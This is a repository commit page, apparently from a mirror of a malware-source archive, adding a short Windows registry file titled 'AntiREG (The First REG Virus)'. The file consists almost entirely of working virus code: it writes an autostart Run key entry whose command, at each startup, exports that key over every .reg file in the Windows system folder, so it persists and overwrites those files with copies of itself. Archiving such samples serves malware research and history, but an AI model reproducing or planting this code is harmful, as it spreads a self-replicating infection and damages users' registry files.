mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-15 07:19:23 +00:00
Add files via upload
This commit is contained in:
@@ -0,0 +1,13 @@
|
||||
REGEDIT4
|
||||
|
||||
;;-------------------------------;;
|
||||
;; ;;
|
||||
;; AntiREG (The First REG Virus) ;;
|
||||
;; Coded By Lys Kovick ;;
|
||||
;; Special Thanks To Phage ;;
|
||||
;; ;;
|
||||
;;-------------------------------;;
|
||||
|
||||
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\]
|
||||
@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
||||
|
||||
Reference in New Issue
Block a user